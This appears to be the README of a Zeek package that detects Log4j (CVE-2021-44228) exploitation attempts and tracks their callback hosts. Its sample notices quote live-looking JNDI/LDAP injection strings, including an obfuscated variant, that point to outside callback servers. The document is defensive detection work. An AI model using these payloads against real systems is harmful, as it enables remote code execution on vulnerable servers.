log4j


Simple policy to detect CVE_2021_44228 aka Log4j

Following functionality are provided by the script

:: 1) Log4j zeek package identifies CVE_2021_44228 exploitation attempts
2) extracts the callback IP + domain and watches them 3) builds realtime IoCs from these attacks and realtime adds to the intel-framework

Installation

zeek-pkg install zeek/initconf/log4j or @load log4j/scripts

Detailed Notes:

Detail Alerts and descriptions: Following alerts are generated by the script:

This should generate following Kinds of notices:

  • Log4j::Attempt
  • Log4j::CallBackIP
  • Log4j::CallBack

Example notice:

XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 45.131.195.245 18677 12.23.36.5 80 - - - tcp Log4j::Attempt Malicious user agent Mozilla/5.0 ${jndi:ldap://45.58.177.50:1389/Rsc} seen from host 45.131.195.245 - 45.131.195.245 12.23.36.5 80 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - - --

XXXXXXXXXX.XXXXXX - 45.131.195.245 18677 12.23.36.5 80 - - - tcp Log4j::CallBackIP Callback IP [45.58.177.50] seen from host 45.131.195.245 with payload of [[uri=45.58.177.50:1389/Rsc, uri_path=Rsc, stem=45.58.177.50:1389, host=45.58.177.50, port=1389/tcp]] - 45.58.177.50 12.23.36.5 80 - - Notice::ACTION_LOG (empty)86400.000000 - - - - - - -

XXXXXXXXXX.XXXXXX CDI95K1GQpHhlE1WO3 192.168.86.35 64759 45.58.177.50 1389 - - - tcp Log4j::CallBack Possible Successful Callback seen [45.58.177.50:1389/tcp] : attack connection [orig_h=45.131.195.245, orig_p=18677/tcp, resp_h=12.23.36.5, resp_p=80/tcp] - 45.58.177.50 45.58.177.50 1389 - - Notice::ACTION_LOG (empty)1800.000000

Complex regexps:

XXXXXXXXXX.XXXXXX ClEkJM2Vm5giqnMf4h 149.209.6.114 45754 131.177.124.168 80 - - - tcp Log4j::Attempt Malicious user agent ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec} seen from host 149.209.6.114 - 149.209.6.114 131.177.124.168 80 - - Notice::ACTION_LOG (empty) 3600.000000

Embedded domains:

XXXXXXXXXX.XXXXXX CtPZjS20MLrsMUOJi2 14.36.22.37 34404 134.93.97.18 80 - - - tcp Log4j::Attempt Malicious user agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@${jndi:ldap://User-Agent.blah.com.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.bc} seen from host 14.36.22.37 - 14.36.22.37 134.93.97.18 80 - - Notice::ACTION_LOG (empty) 3600.000000

Also resolves the domain and watches for the IP/port:

XXXXXXXXXX.XXXXXX - 14.36.22.37 34404 134.93.97.18 80 - - - tcp Log4j::CallBackIP Callback IP [52.16.21.24] seen from host 14.36.22.37 with payload of [[uri=User-Agent.blah.com.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.bc, uri_path=a.bc, stem=User-Agent.blah.com.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net, host=52.16.21.24, port=80/tcp]] - 52.16.21.24 134.93.97.18 80 - - Notice::ACTION_LOG (empty) 86400.000000

Example Summary Notice:

Package Version :